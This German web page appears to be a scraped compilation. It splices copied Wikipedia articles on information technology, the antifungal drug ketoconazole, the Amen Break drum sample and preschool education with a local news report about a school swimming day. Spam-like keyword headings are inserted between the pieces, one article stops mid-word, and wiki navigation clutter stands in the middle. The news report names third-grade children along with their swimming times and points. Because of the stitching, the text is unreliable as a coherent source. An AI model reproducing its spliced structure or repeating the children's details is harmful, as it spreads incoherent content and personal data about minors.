Die globale technologische Kapazität, Informationen zu speichern, ist von 2,6 (optimal komprimierten) Exabyte im Jahr 1986 auf 300 (optimal komprimierten) Exabyte im Jahr 2007 gewachsen, wobei 1986 weniger als 1 % der globalen Speicherkapazität digital war, und 2007 fast 95 %.[3] Dies ist das informationale Äquivalent von 404 Milliarden CD-ROMs für 2007. Es wird angenommen, dass es der Menschheit 2002 erstmals möglich war, mehr Information digital als im Analogformat zu speichern; quasi der Beginn des „digitalen Zeitalters“.[2]
Die technologische Kapazität der Welt, Informationen mit digitalen Mehrzweck-Computern zu berechnen, ist von 3,0 × 108 MIPS im Jahr 1986 bis zu 6,4 × 1012 MIPS im Jahr 2007 gewachsen,[3] was einer jährlichen Wachstumsrate von 60 % entspricht, also zehnmal schneller als das globale Wirtschaftswachstum.
Gebiete
Vier Teilgebiete werden heute teils unterschieden:
Business-IT beinhaltet die IT von Handel, Börse, Versicherungen, Banken und Steuerwesen.
Industrielle IT befasst sich mit der Vernetzung der Maschinen in Herstellungs- und Produktionsprozessen innerhalb eines Werkes, zunehmend aber auch über die Werk- und Firmengrenzen hinweg (Supply Chain). Neuerdings wird die Industrielle IT direkt an die Geschäftsprozesse angebunden. So entstehen etwa Schnittstellen zwischen den Bussystemen, die die Maschinen steuern, und den Ressourcen-Planungs-Systemen (ERP-Software).
„Eine gebräuchliche Bezeichnung im Einsatzgebiet industrieller IT ist der Fachbegriff Operational Technology (OT),[4] der versucht, alle interagierende Komponenten in komplexen und abhängigen Systemen zu beschreiben. Diese Komponenten werden meist über SCADA-Systeme hochintegriert gesteuert und überwacht.“
Kommunikations-IT befasst sich mit dem Einsatz der Telekommunikation.
Unterhaltungs-IT befasst sich mit Spielgeräten und Multimedia-Anwendungen.
Lehrberuf in Österreich
In Österreich ist Informationstechnologie auch ein anerkannter Lehrberuf. Die Ausbildung spaltet sich dabei schon zu Beginn an in die zwei getrennten Bereiche Informatik und Technik, die Lehrzeit bleibt mit 3,5 Jahren jedoch gleich. Während das Hauptaugenmerk der Informatik-Ausbildung mehr um die Programmierung und Anpassung von Software kreist, ist die Technik-Ausbildung mehrheitlich Hardware-spezifisch.
Literatur
Siegfried Wendt: Nichtphysikalische Grundlagen der Informationstechnik. Interpretierte Formalismen. Springer, Berlin 1989, ISBN 978-3-540-51555-5.
Horst Jansen, Heinrich Rötter: Informationstechnik und Telekommunikationstechnik (Lernmaterialien). Europa-Lehrmittel, Haan 2003, ISBN 3-8085-3623-3.
Andreas Holzinger: Basiswissen IT/Informatik. Band 1: Informationstechnik (Das Basiswissen für die Informationsgesellschaft des 21. Jahrhunderts). Vogel, Würzburg 2002, ISBN 3-8023-1897-8.
Klaus Gotthardt: Grundlagen der Informationstechnik. Lit-Verlag, Münster 2001, ISBN 3-8258-5556-2.
Walter Hehl: Trends in der Informationstechnologie. Von der Nanotechnologie zu virtuellen Welten. vdf Hochschulverlag AG an der ETH Zürich, Zürich 2008, ISBN 978-3-7281-3174-4.
Horst Völz: Das ist Information. Shaker Verlag, Aachen 2017, ISBN 978-3-8440-5587-0.
Horst Völz: Wie wir wissend wurden. Nicht Alles ist Information. Shaker Verlag, Aachen 2018, ISBN 978-3-8440-5865-9.
Wörterbücher
Dietmar Schanner: Wörterbuch Informationstechnik und Medien. Cornelsen, Berlin 2001, ISBN 3-464-49417-9.
Weblinks
WiktionaryWiktionary: Informationstechnik – Bedeutungserklärungen, Wortherkunft, Synonyme, Übersetzungen
WikibooksWikibooks: EDV – Lern- und Lehrmaterialien
Literatur über Informationstechnik im Katalog der Deutschen Nationalbibliothek
Sascha Kersken: Kompendium der Informationstechnik – Openbook: EDV-Grundlagen, Programmierung, Mediengestaltung
Phenomenological Approaches to Ethics and Information Technology. In: Edward N. Zalta (Hrsg.): Stanford Encyclopedia of Philosophy.
Berufs- und Brancheninfos, Zweig Informatik der Wirtschaftskammer Österreich
Berufs- und Brancheninfos, Zweig Technik der Wirtschaftskammer Österreich
Zweig Informatik. Berufsbeschreibung BIC
Zweig Technik. Berufsbeschreibung BIC
Einzelnachweise
Institut für Interne Revision Österreich – IIA Austria (Hrsg.): Informationssicherheitsmanagementsystem. Damoklesschwert Daten-GAU – Systematische Prüfung und wirksame Prävention. Linde Verlag, Wien 2016, ISBN 978-3-7094-0850-6, Rahmenkonzepte und Prüfansätze, S. 141, S. 29.
Video Animation über The World’s Technological Capacity to Store, Communicate, and Compute Information from 1986 to 2010 (Memento des Originals vom 18. Januar 2012 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis.
Martin Hilbert, Priscila López: The World’s Technological Capacity to Store, Communicate, and Compute Information. In: Science, 332(6025), 2011, S. 60–65; kostenfreien Zugriff auf den Artikel gibt es durch diese Seite: martinhilbert.net/WorldInfoCapacity.html
Operational Technology gartner.com
Normdaten (Sachbegriff): GND: 4026926-7
Kategorien:
InformationstechnikTechnisches Fachgebiet
Navigationsmenü
Nicht angemeldet
Diskussionsseite
Beiträge
Benutzerkonto erstellen
Anmelden
Artikel
Diskussion
Lesen
Bearbeiten
Quelltext bearbeiten
Versionsgeschichte
Suche
Hauptseite
Themenportale
Zufälliger Artikel
Mitmachen
Artikel verbessern
Neuen Artikel anlegen
Autorenportal
Hilfe
Letzte Änderungen
Kontakt
Spenden
Werkzeuge
Links auf diese Seite
Änderungen an verlinkten Seiten
Spezialseiten
Permanenter Link
Seiteninformationen
Wikidata-Datenobjekt
Artikel zitieren
In anderen Projekten
Commons
Wikibooks
Drucken/exportieren
Buch erstellen
Als PDF herunterladen
Druckversion
In anderen Sprachen
Alemannisch
Dansk
English
Español
Français
Italiano
Nederlands
Русский
Türkçe
Links bearbeiten
Diese Seite wurde zuletzt am 7. Juni 2019 um 18:31 Uhr bearbeitet.
Abrufstatistik · Autoren
Der Text ist unter der Lizenz „Creative Commons Attribution/Share Alike“ verfügbar; Informationen zu den Urhebern und zum Lizenzstatus eingebundener Mediendateien (etwa Bilder oder Videos) können im Regelfall durch Anklicken dieser abgerufen werden. Möglicherweise unterliegen die Inhalte jeweils zusätzlichen Bedingungen. Durch die Nutzung dieser Website erklären Sie sich mit den Nutzungsbedingungen und der Datenschutzrichtlinie einverstanden.
Wikipedia® ist eine eingetragene Marke der Wikimedia Foundation Inc.
Terzolin
Ketoconazol
Zur Navigation springen
Zur Suche springen
Strukturformel
Ketoconazol-Enantiomere Strukturformeln.png
Ketoconazol, ein 1:1-Gemisch der Stereoisomere (2S,4R)-Ketoconazol (oben) und (2R,4S)-Ketoconazol (unten)
Allgemeines
Freiname Ketoconazol
Andere Namen
weißes bis fast weißes Pulver[1]
Externe Identifikatoren/Datenbanken
CAS-Nummer 65277-42-1
Arzneistoffangaben
ATC-Code
J02AB02
D01AC08
G01AF11
Wirkstoffklasse
Antimykotikum
Wirkmechanismus
Hemmung der Biosynthese des Ergosterols der Pilze
Eigenschaften
Molare Masse 531,43 g·mol−1
Aggregatzustand
fest
Schmelzpunkt
146 °C[2]
Löslichkeit
praktisch unlöslich in Wasser, leicht löslich in Dichlormethan, löslich in Methanol, wenig löslich in Ethanol[1]
Sicherheitshinweise
Bitte die Befreiung von der Kennzeichnungspflicht für Arzneimittel, Medizinprodukte, Kosmetika, Lebensmittel und Futtermittel beachten
GHS-Gefahrstoffkennzeichnung aus Verordnung (EG) Nr. 1272/2008 (CLP),[4] ggf. erweitert[3]
06 – Giftig oder sehr giftig 08 – Gesundheitsgefährdend 09 – Umweltgefährlich
Soweit möglich und gebräuchlich, werden SI-Einheiten verwendet. Wenn nicht anders vermerkt, gelten die angegebenen Daten bei Standardbedingungen.
Ketoconazol ist ein Arzneistoff aus der Gruppe der Imidazole, der zur Vorbeugung und Behandlung von Pilzerkrankungen der Haut verwendet wird.
Inhaltsverzeichnis
Ketoconazol wurde 1978 von Janssen-Cilag patentiert[5] und Anfang der 80er Jahre in den Handel gebracht. Es war das erste oral anwendbare Antimykotikum.
Anwendung
Das Medikament wird besonders bei Personen mit einer Erkrankung des Immunsystems wie AIDS oder Infektionen aufgrund von Autoimmunerkrankungen eingesetzt. Beispiele für mit dem Medikament behandelbare Erkrankungen sind das Seborrhoische Ekzem oder die Pityriasis versicolor (Kleienpilzflechte).
Ketoconazol wird beispielsweise in Anti-Schuppen-Shampoos verwendet. Es gibt verschieden starke Dosierungen des Mittels. Das Shampoo kann wie ein normales Shampoo benutzt werden, wenn es nach der Anwendung gründlich ausgespült wird. Im Rahmen einer Schwangerschaft sollte sicherheitshalber auf die Anwendung verzichtet werden, da im Tierversuch eine Fruchtschädigung bei hohen Dosierungen auftrat.
Ketoconazol ist apothekenpflichtig; Arzneiformen zur systemischen Anwendung (Tabletten) sind zudem in den meisten Ländern rezeptpflichtig.[6]
Ebenso wird Ketoconazol angewendet bei dem sogenannten Morbus Cushing. Es hemmt die Produktion von Cortisol und kommt zum Einsatz, wenn operative Maßnahmen nicht möglich sind.
Wirkungsweise
Ketoconazol verhindert die Produktion von Ergosterol, das den Hauptbestandteil der Zellmembran der Erreger darstellt. Die Wirkungsweise beruht auf der Hemmung von Cytochrom P450 abhängigen Enzymen,[7] woraus sich sowohl die Hepatotoxizität als auch die Nutzung bei Morbus Cushing erklären lässt. Die Synthese von NNR-Hormonen (z. B. Cortisol) benötigt an mehreren Stellen von Cytochrom P450 abhängige Enzyme.
Behandelbare Erreger
Ketoconazol verhindert das Wachstum von Dermatophyten und von Hefepilzen wie Candida albicans. Resistenzen gegen Ketoconazol sind bei einigen Candida albicans-Stämmen bekannt.
Nebenwirkungen
Die Europäische Arzneimittel-Agentur will die oralen Ketoconazole aufgrund der starken Leberschädigung verbieten.[8][9] Die FDA gibt im Gegensatz dazu nur Warnhinweise zur Verwendung oraler Ketoconazole heraus.[10]
Ketoconazol in oraler Form ist aufgrund seiner Eigenschaft als Hemmer der Cytochrom-P450-Enzyme in der Nebenniere ein starker Hemmer der Cortisolsynthese. Ferner hat Ketoconazol direkte Auswirkungen auf kortikotrope Tumorzellen bei Patienten mit Cushing-Syndrom. Ketoconazol in oraler Form ist kontraindiziert bei Patienten mit akuten oder chronischen Lebererkrankungen oder wenn die Leberenzymwerte bei Behandlungsbeginn um mehr als das Zweifache über der Obergrenze des Normwerts liegen. Eine Behandlung damit darf nicht fortgeführt werden, wenn Symptome einer Hepatitis vorliegen oder die Leberenzymwerte auf das Dreifache der Obergrenze der Normwerte ansteigen.[11]
Der Mechanismus der Schädigung der Leber infolge der Einnahme von Ketoconazol ist nicht vollständig geklärt. Aufgrund des Risikos von Hepatotoxizität wurde im Oktober 2013 die Marktzulassung für orales Ketoconazol als Antimykotikum suspendiert.[11]
Aufgrund seiner Nebenwirkungen wird Ketoconazol vermehrt durch neuere Fungizide ersetzt, wie beispielsweise Fluconazol und/oder Itraconazol.
Chemische Eigenschaften
Ketoconazol ist ein weißes bis gelbliches Pulver mit einer Schmelztemperatur von 146 °C. Es ist stark lipophil und sehr wenig löslich in Wasser. Es ist ein Imidazolderivat und gehört allgemein zur Gruppe der Azol-Fungizide.
Stereoisomerie
Aus der Strukturformel von Ketoconazol ist erkennbar, dass das Molekül am 1,3-Dioxolan-Ring zwei Stereozentren in der 2- und in der 4-Position enthält. Theoretisch gibt es also folgende vier Stereoisomere: Die (2S,4R)-Form und die dazu spiegelbildliche (2R,4S)-Form sowie die (2S,4S)-Form und die dazu spiegelbildliche (2R,4R)-Form. Als Arzneistoff wird ein Racemat (1:1-Gemisch) der zueinander enantiomeren (2S,4R)-Form und der (2R,4S)-Form eingesetzt, das auch als racemische cis-Form oder (±)-cis-Form bezeichnet wird.
Die (2R,4R)-Form sowie die (2S,4S)-Form haben keine praktische Bedeutung.
Handelsnamen
Monopräparate
Nizoral (CH, D), Terzolin (D), Ket (D), Fungoral (A), Lur (CH), Ninazol (Th)
Einzelnachweise
Europäische Arzneibuch-Kommission (Hrsg.): EUROPÄISCHE PHARMAKOPÖE 5. AUSGABE. Ban
Deichkind Porzelan und Elefanten Coldplay Paradise
Laiska Kleber Benutzerdaten uebermittelt
So, Laiska kann jetzt auch was schreiben. Einen Artikel :-)
Amen Break
Zur Navigation springenZur Suche springen
Wellenform des Amen Break
Der Amen Break ist ein Sample aus dem Stück Amen, Brother der Soulband The Winstons von 1969. Es handelt sich um ein kurzes Solo des Schlagzeugers Gregory C. Coleman in der Mitte des Songs. Der Break ist vier Takte lang, dauert sechs Sekunden und ist für einen Funkbreak mit etwa 130 bpm relativ schnell.
Der Amen Break ist eines der am häufigsten genutzten Samples in der Geschichte des Hip-Hop und der elektronischen Musik. Den Bandmitgliedern war die Verwendung und der Erfolg des Samples nicht bekannt. Sänger Richard Lewis Spencer erfuhr erst Mitte der Neunziger davon, als sich jemand telefonisch um die Rechte an dem Song bemühte.[1]
Durch eine im Februar 2015 gestartete Crowdfunding-Aktion war es im November desselben Jahres möglich, Spencer eine Summe von 24.000 US-Dollar zu überreichen. Der Urheber des Amen Break, Schlagzeuger Gregory Coleman, war 2006 in Obdachlosigkeit verstorben.[2][3]
Der kraftvolle und dabei relativ dumpfe Klang der Schlagzeugaufnahme und der einprägsame, synkopierte Rhythmus machen das Sample besonders brauchbar, um in höherem Tempo abgespielt zu werden, beispielsweise indem eine 33⅓-UpM-Schallplatte mit 45 Umdrehungen pro Minute abgespielt wird. Das effektive Tempo liegt dann bei etwa 175 bpm. Breakbeats und der Amen Break im Speziellen sind die Grundlage der Jungle-Musik, aus der später Drum and Bass entstand. Vor allem anfangs enthielt nahezu jedes Jungle-Stück den Amen Break in mehr oder weniger erkennbarer Form, aber auch noch heute wird er immer wieder eingesetzt. Das Tempo von 175 bpm des schneller abgespielten Breaks ist auch immer noch das gängige Tempo im Drum and Bass.
>>
Notation des Amen Breaks mit Hi-Hat/Crash, Snaredrum, Bassdrum (v. o. n. u.)[4]
Heutzutage wird der Amen Break nicht mehr einfach nur schneller abgespielt, sondern in einzelne kurze Samples zerteilt, die dann neu angeordnet werden können. Besonders die durchgängig klingenden Becken erzeugen hierbei einen reizvollen Effekt. Dabei werden die Samples (auch unabhängig voneinander) mit unterschiedlichen Verfremdungseffekten bearbeitet und mit verschiedenen Tonhöhen (pitches) wiedergegeben. Zum Teil werden die Samples auch mit anderen Schlagzeug-Samples kombiniert. Trotzdem hat der Amen Break wegen seines charakteristischen Klangs einen hohen Wiedererkennungswert. Die beschriebene Technik wird im Drum and Bass und anderen Stilen der elektronischen Musik auch für andere Schlagzeug-Breaks verwendet. Es kann davon ausgegangen werden, dass insbesondere im Jungle und Drum and Bass – aber auch in anderen Stilen wie Breakcore – der Amen Break zigtausendfach verwendet wurde.
Weblinks
Remix-Museum
whosampled.com
Nate Harrison: Can I Get An Amen? – Audio-Installation über den Amen Break (englisch)
Michail Hengstenberg: Kultsample "Amen Break". Vier Takte für die Ewigkeit – einestages.spiegel.de
Einzelnachweise
Michail Hengstenberg: Kultsample "Amen Break". Vier Takte für die Ewigkeit. In: einestages.spiegel.de. 16. Februar 2011, abgerufen am 20. Oktober 2015.
"Amen Break": Crowdfunding für berühmtesten Drum-Beat aller Zeiten
Die Musiker hinter dem "Amen Break" haben endlich Geld dafür bekommen (Memento des Originals vom 22. November 2015 im Internet Archive) i Info: Der Archivlink wurde automatisch eingesetzt und noch nicht geprüft. Bitte prüfe Original- und Archivlink gemäß Anleitung und entferne dann diesen Hinweis., Noisey/VICE.
vgl. Mark Jonathan Butler: Unlocking the Groove: Rhythm, Meter, and Musical Design in Electronic. Indiana University Press, Bloomington 2006, ISBN 0-253-34662-2, S. 78–80. sowie File:Amen break notation.png für den Satz
Kategorie: Breakbeat
Schwimmen mit Brett und Muetze
ARACHNO mixed by DJSpaceCourt - Summer Memories 3
Schwimmen mit Brett und Mütze
vonRedaktion
Mücke-Ober-Ohmen (pm). Die 3. Klassen der Grundschule Oberes Ohmtal veranstalteten kürzlich ihr Schwimmfest im Hallenbad "Aquariohm". Die Schüler absolvierten mehrere Stationen im Schwimmspaß, eine Klassenstaffel und 25-m-Brustschwimmen. Organisiert wurde die Veranstaltung von Nina Weck, unterstützt wurde sie von den Schwimmlehrern Liane Heitmann und Holger Frommann, von den Klassenlehrerinnen Silke Lang-Michaelis und Anna Epp, sowie von den Eltern Patrick ten Elsen, Laiska Kleber und Saskia Pfeffer.
Mücke-Ober-Ohmen (pm). Die 3. Klassen der Grundschule Oberes Ohmtal veranstalteten kürzlich ihr Schwimmfest im Hallenbad "Aquariohm". Die Schüler absolvierten mehrere Stationen im Schwimmspaß, eine Klassenstaffel und 25-m-Brustschwimmen. Organisiert wurde die Veranstaltung von Nina Weck, unterstützt wurde sie von den Schwimmlehrern Liane Heitmann und Holger Frommann, von den Klassenlehrerinnen Silke Lang-Michaelis und Anna Epp, sowie von den Eltern Patrick ten Elsen, Laiska Kleber und Saskia Pfeffer.
Beim Brustschwimmen der Jungen kamen auf die Plätze 1 bis 5: Konstantin Reus (Klasse 3a; 27,31 s), Jan David Hoesche (3c; 30,86 s), Theo Liehr (3c; 31,13 s), David Chodura (3b; 32,45 s) und Yannik Decher (3a; 32,73 s). Die fünf besten Mädchen waren Amelie Klös (3a; 28,31 s), Sofia Kin (3b; 31 s), Emily Hofmann (3a; 31,25 s), Amelie Rühl (3c; 31,97 s) und Hailey Schmidt (3b; 34,18 s).
Beim Schwimmspaß konnten die Kinder beim Springen, Gleiten, Streckentauchen und beim Tieftauchen Punkte sammeln, wobei unterschiedlich schwere Gegenstände an die Wasseroberfläche zu holen waren. Im Flachen galt es durch einen Tunnel zu tauchen oder in einem Tauchgang mehrere Ringe hintereinander einzusammeln.
Zielwerfen mit Bällen stand ebenso auf dem Programm wie für die weniger geübten Schwimmanfänger das Hinhocken, Hinknien oder Hinsetzen im Flachen oder unter Wasser Buchstaben zu erkennen. Die meisten Punkte sammelten bei den geübten Schwimmern Julian Sgolik, Moritz Adamek und Amelie Klös (jeweils 24 Punkte), gefolgt von Janne Hof mit 23 Punkten und Elias Pfeffer, Jan Zaprzalski und Nora Schlosser mit jeweils 22 Punkten. Die meisten Punkte in der Gruppe "Wasserflöhe" erzielten Lili Stein (20 Punkte), Alisa Bork, Sebastian Förster (jeweils 18 Punkte) und Hanna ten Elsen (17 Punkte).
Die Klassenstaffel gewann die Klasse 3b. Im Gegenverkehr trug ein Schwimmer eine Mütze, und sein Gegenüber musste ein Schwimmbrett, auf dem ein Becher stand, transportieren. In der Mitte der Strecke wurden Schwimmbrett und Mütze getauscht.
Vorschule Wikipedia Rippin Wettbewerb 2
Vorschule
Zur Navigation springen
Zur Suche springen
Der Titel dieses Artikels ist mehrdeutig. Weitere Bedeutungen sind unter Vorschule (Begriffsklärung) aufgeführt.
Vorschule ist die Erziehung vor dem Schuleintritt, z. B. im Kindergarten und in gesonderten Vorschuleinrichtungen, die schulische Leistungen vorbereiten und besonders die Benachteiligung von Kindern aufgrund ihrer sozialen Herkunft abbauen soll. Die Vorschulerziehung wird in den deutschsprachigen Staaten sehr unterschiedlich gehandhabt.
Inhaltsverzeichnis
1 Deutschland
1.1 Ursprüngliche Bezeichnung im Kaiserreich und Nennung im Grundgesetz
1.2 Vorschule
1.3 Kindergarten
1.4 Vorschulähnliche Erziehung an Grundschulen
1.4.1 Aktuelle Einrichtungen (Stand: 2014)
1.4.2 Frühere Einrichtungen
2 Österreich
3 Vorschulen in anderen Ländern
3.1 Finnland
3.2 Frankreich
3.3 Vereinigte Staaten
4 Siehe auch
5 Literatur
6 Weblinks
7 Einzelnachweise
Deutschland
Ursprüngliche Bezeichnung im Kaiserreich und Nennung im Grundgesetz
Im Deutschen Kaiserreich (bis 1918) bezeichnete das Wort „Vorschule“ eine Schulform, die von der ersten bis zur dritten Klasse reichte. Sie konnte anstelle der Grundschule besucht werden, war ein Jahr kürzer und bereitete auf das Gymnasium vor. Ihr Besuch kostete erhebliche Gebühren, sodass sie den wohlhabenderen Bevölkerungsschichten vorbehalten blieb. Dadurch hatten die Kinder aus diesen Schichten einen Vorteil in der weiteren höheren Bildung (Gymnasium, Universität). In der Weimarer Republik wurden die Vorschulen deshalb abgeschafft.
Noch heute findet sich im Art. 7 Abs. 6 des Grundgesetzes der Satz „Vorschulen bleiben aufgehoben“, der aus der Weimarer Reichsverfassung übernommen wurde. Der Satz bezieht sich auf die privaten Vorschulen, die auf den Besuch des Gymnasiums vorbereiten sollten. Sie wurden 1920 durch die kostenlose staatliche Grundschule ersetzt. Vorschulen sollen nach heutigem Sprachgebrauch auf die Grundschule vorbereiten.
Vorschule
Eine typische Vorschule – zwischen Kindergarten und Grundschule – gibt es heute (mit Ausnahme zum Beispiel in Hamburg) kaum noch. Schulkindergärten oder Vorschulklassen werden, wo sie noch bestehen, abgebaut und dem Kindergartenbereich zugeordnet. Eine solche (auf das letzte Jahr vor der Einschulung konzentrierte) Vorbereitung auf die Schule wurde als spät einsetzend und zu kurz greifend kritisiert. In der Bildungsdebatte der 1970er Jahre in der Bundesrepublik Deutschland stand die Frage der Zuordnung der fünfjährigen Kinder schon einmal auf der Tagesordnung und wurde bereits damals zugunsten des Kindergartens entschieden.
In der DDR war dies immer unumstritten. Der Vorschulunterricht wurde in der Regel ein Jahr vor der Einschulung in demselben Gebäude durchgeführt, in dem sich die künftige Schule befand. Der Unterricht sollte den Kindern helfen, sich auf den auf sie zukommenden Schulunterricht hin zu orientieren und an dessen Rhythmus anzupassen. Zum Unterricht gehörten Sprachübungen, Handmotorik, mathematische Vorstellungen und Kreativität.[1]
Die im Zuge der PISA-Studien kritisierten Defizite der frühen Bildung richten sich nicht auf das Fehlen einer Vorschule, sondern auf die zu wenig systematische und ungenügend neueren wissenschaftlichen Erkenntnissen folgende frühe Bildung in den verschiedenen Formen der Kindertagesbetreuung.
Kindergarten
→ Hauptartikel: Kindergarten
In Kindergärten, die die Kinder ab dem dritten Lebensjahr besuchen, gibt es im Gegensatz zu Schulen keinen allgemeinverbindlichen Lehrplan. Art. 7 Grundgesetz billigt zwar der Schule einen (gegenüber dem Elternwillen) eigenständigen Bildungsauftrag zu, nicht aber den Einrichtungen der Kindertagesbetreuung. Die inhaltliche Gestaltungshoheit, auch die Festsetzung von Bildungszielen, liegt beim Träger der Einrichtung. Seit 2004 gibt es (auch infolge der PISA-Studien) eine verstärkte Diskussion über die frühe Bildung. Inzwischen haben fast alle Bundesländer Bildungspläne, die zumeist über Vereinbarungen mit den Trägern eine gewisse Verbindlichkeit erlangen sollen.
Vorschulähnliche Erziehung an Grundschulen
Aktuelle Einrichtungen (Stand: 2014)
In den in einigen Bundesländern bestehenden Schulkindergärten bzw. in den baden-württembergischen Grundschulförderklassen werden Kinder aufgenommen, die bei Erreichen des Alters für die allgemeine Schulpflicht noch nicht die erforderliche Schulreife haben. In den Förderklassen erwerben die Kinder neben den sozialen Kompetenzen auch fehlende sprachliche, graphomotorische und kognitive Fähigkeiten. Ziel dieser Einrichtungen ist es, eine Einschulung in einer Grundschule zum Beginn des nächsten Schuljahres zu ermöglichen. Der Ausgleich von defizitären Deutschkenntnissen gehört auch zum Aufgabenbereich einer Grundschulförderklasse.[2]
1970 wurden in Hamburg die ersten Vorschulklassen eingerichtet.[3] Die existierenden Vorschulklassen sind Einrichtungen der Grundschulen. Im Schuljahr 2013/14 wurden an 237 von 246 Grundschulen in Hamburg Vorschulklassen eingerichtet.[4] In die Vorschule aufgenommen werden schulpflichtige Kinder, die vom Besuch der Grundschule zurückgestellt worden sind und Kinder, bei denen im Rahmen der im Hamburgischen Schulgesetz vorgeschriebenen Sprachstandserhebung Defizite festgestellt worden sind.[5] Bei zurückgestellten Kindern besteht freie Wahl, ob sie eine Vorschulklasse an einer Grundschule besuchen wollen oder das Kind weiter in einer Kindertagesstätte betreut wird. Für Kinder, bei denen im Rahmen des Vorstellungsverfahrens ein ausgeprägter Sprachförderbedarf ermittelt wurde, ist ein Besuch der Vorschulklassen vor der Einschulung verpflichtend.[6]
In Bayern erhalten Kinder, deren Eltern beide nicht deutschsprachiger Herkunft sind und denen durch Sprachstandserhebung unzureichende Deutschkenntnisse bescheinigt werden, eine 240 Stunden dauernde spezielle Deutschförderung, den sogenannten Vorkurs. Die Vorkurse finden über einen Zeitraum von insgesamt eineinhalb Jahren statt.[7] Verpflichtend sind sie für schulpflichtige Kinder ausländischer Herkunft ohne ausreichende Deutschkenntnisse, die von der Einschulung zurückgestellt werden.[8] Die Vorkurse werden in enger Kooperation von pädagogischen Fachkräften der Kindergärten und Grundschullehrern durchgeführt.
Frühere Einrichtungen
Im Schulversuch (in Hessen und in Nordrhein-Westfalen) wurde in den 1970er Jahren die Grundschulzeit an manchen Schulen um ein Jahr vorgezogen und verlängert. Die Kinder wurden auf Wunsch der Eltern bereits ein Jahr vor Erreichen der Schulpflicht in die Schule aufgenommen. Im Rahmen des Schulversuchs sollten die Kinder spielerisch in den Schulalltag und an das Lernen herangeführt werden. Wegen der vorzeitigen Einschulung wurde der Schulversuch umgangssprachlich auch Vorschule genannt.
In Berlin wurde im Rahmen einer Schulreform die Vorschule zum letzten Mal im Schuljahr 2004/2005 durchgeführt. Gleichzeitig wurde das Einschulungsalter der Kinder um ein halbes Jahr vorverlegt. Dies hat zur Folge, dass 2005 anderthalb Jahrgänge eingeschult wurden. Die auf die Schule vorbereitende Erziehung soll zukünftig in den Kindergärten umgesetzt werden. Danach sollen die Kinder in eine „flexible Eingangsphase“, die zwischen einem und drei Jahren dauern kann, kommen. Nach der Eingangsphase kommen die Kinder dann in die 3. Klasse. Mit diesem Konzept soll erreicht werden, dass die Kinder in der 3. Klasse in etwa den gleichen Leistungsstand haben.
Österreich
In Österreich werden nicht schulreife, aber schulpflichtige Kinder in die Vorschule aufgenommen. Das bedeutet, dass diese Kinder in einer eigenen Vorschulklasse unterrichtet werden, sofern es diese an der Schule gibt, oder sie werden innerhalb der ersten Klasse Volksschule als Vorschulkinder geführt und nach dem Lehrplan der Vorschule unterrichtet. Ebenso kann es während des ersten Schuljahres zu einer Rückstellung in die Vorschule kommen, aber auch ein Aufstieg in die Volksschule ist innerhalb des Jahres möglich (flexible Schuleingangsphase). Die Kinder werden bereits im Kindergarten speziell gefördert, damit der Besuch einer Vorschule möglichst entfallen kann.
Die Vorschulzeit gilt als Teil der Schulzeit und wird der neunjährigen Schulpflicht angerechnet, womit der Besuch einer Polytechnischen Schule entfallen kann.
Vorschulen in anderen Ländern
Finnland
Finnland hat, wie die PISA-Studie zeigt, eines der erfolgreichsten Bildungssysteme weltweit. Im Vergleich scheint das finnische Bildungssystem dem deutschen deutlich überlegen zu sein.
Bereits in den frühen Jahren wird in Finnland die Bildung der Kinder als förderungs- und unterstützungswürdig angesehen, ohne dass schulische Bildungsformen auf den vorschulischen Bereich übertragen werden. Die Kinder werden relativ spät eingeschult (7 Jahre). Statt einer frühen Einschulung wird auf die Qualifikation der Fachkräfte im Vorschulbereich, auf die Personalausstattung sowie auf eine wissenschaftliche Begleitung und Unterstützung besonderer Wert gelegt.
Grundsätzlich ist in Finnland der Staat für die Betreuung der Kinder zuständig. Kinder haben ein Recht auf Betreuung und Erziehung (unabhängig von der Form). Die Kindertagesstätten gehören in Finnland zum Bildungssystem – im Gegensatz zu Deutschland, wo der Kindergarten von den Sozialministerien beaufsichtigt wird (nicht vom Kultusministerium eines Bundeslandes).
In Finnland besuchen 55 % der Kinder unter 7 Jahren eine Kindertagesstätte. Die Öffnungszeiten betragen ca. 10 Stunden; es gibt aber auch Tagesstätten, die 24 Stunden geöffnet haben. In der Regel wird eine ganz- oder halbtägige Aufnahme des Kindes angeboten. Die Gruppen werden altersgemischt in Ganztags- oder Halbtagsgruppen geführt. Meist besteht der Tag aus folgenden Schwerpunkten (N. Kuch, S. 5):
Zusammenkommen am Morgen
Feste Essenszeiten
Ruhe am Mittag
Spiele draußen
musikalische und Sprachförderung
Bildung soll angeboten werden, ist aber nicht verpflichtend.
Die Gruppengröße für Kinder unter 3 Jahren sind 12 Kinder, für Drei- bis Siebenjährige 20 Kinder. Der Betreuungsschlüssel beträgt für vier Kinder unter 3 Jahren oder für sieben Kinder über 3 Jahren eine Fachkraft (in der Regel eine an der Hochschule ausgebildete Erzieherin, s. u.).
Ein großer Anteil der Kosten für das Bildungssystem werden in Finnland in das Vorschulsystem investiert. Dahinter steckt die Idee, dass frühe Erziehung ein wesentlicher Bestandteil der Bildung ist. Wichtige Schwerpunkte der frühen Bildung sind:
Ethik und Philosophie
Gesundheit
Körperliche und motorische Entwicklung
Kunst und Kultur
Mathematik
Sprache und Interaktion
Umwelt und Naturkunde.
(Siehe dazu Literatur: N. Kuch)
Die Ziele der Vorschulerziehung in Finnland sind (nach Natalija Kuch):
Das positive Selbstbild der Kinder zu festigen und das Lernvermögen zu fördern, wobei spielerisches Lernen im Vordergrund stehen soll.
Das Kind soll lernen, sich als Mitglied der Gruppe zu verstehen.
Sie sollen wissen, was für ihr gesundheitliches Wohlergehen wichtig ist.
Die sprachliche Identität soll entwickelt werden: Sich vielfältig ausdrücken, verschiedene Formen der Kunst kennenlernen – auch aus anderen Kulturen.
Sie sollen ihre Umwelt erkunden und analysieren können; sie sollen sich an Schönheit und Vielfalt erfreuen können und die Folgen ihrer Handlungen für die Umwelt erkennen. (N. Kuch, S. 8)
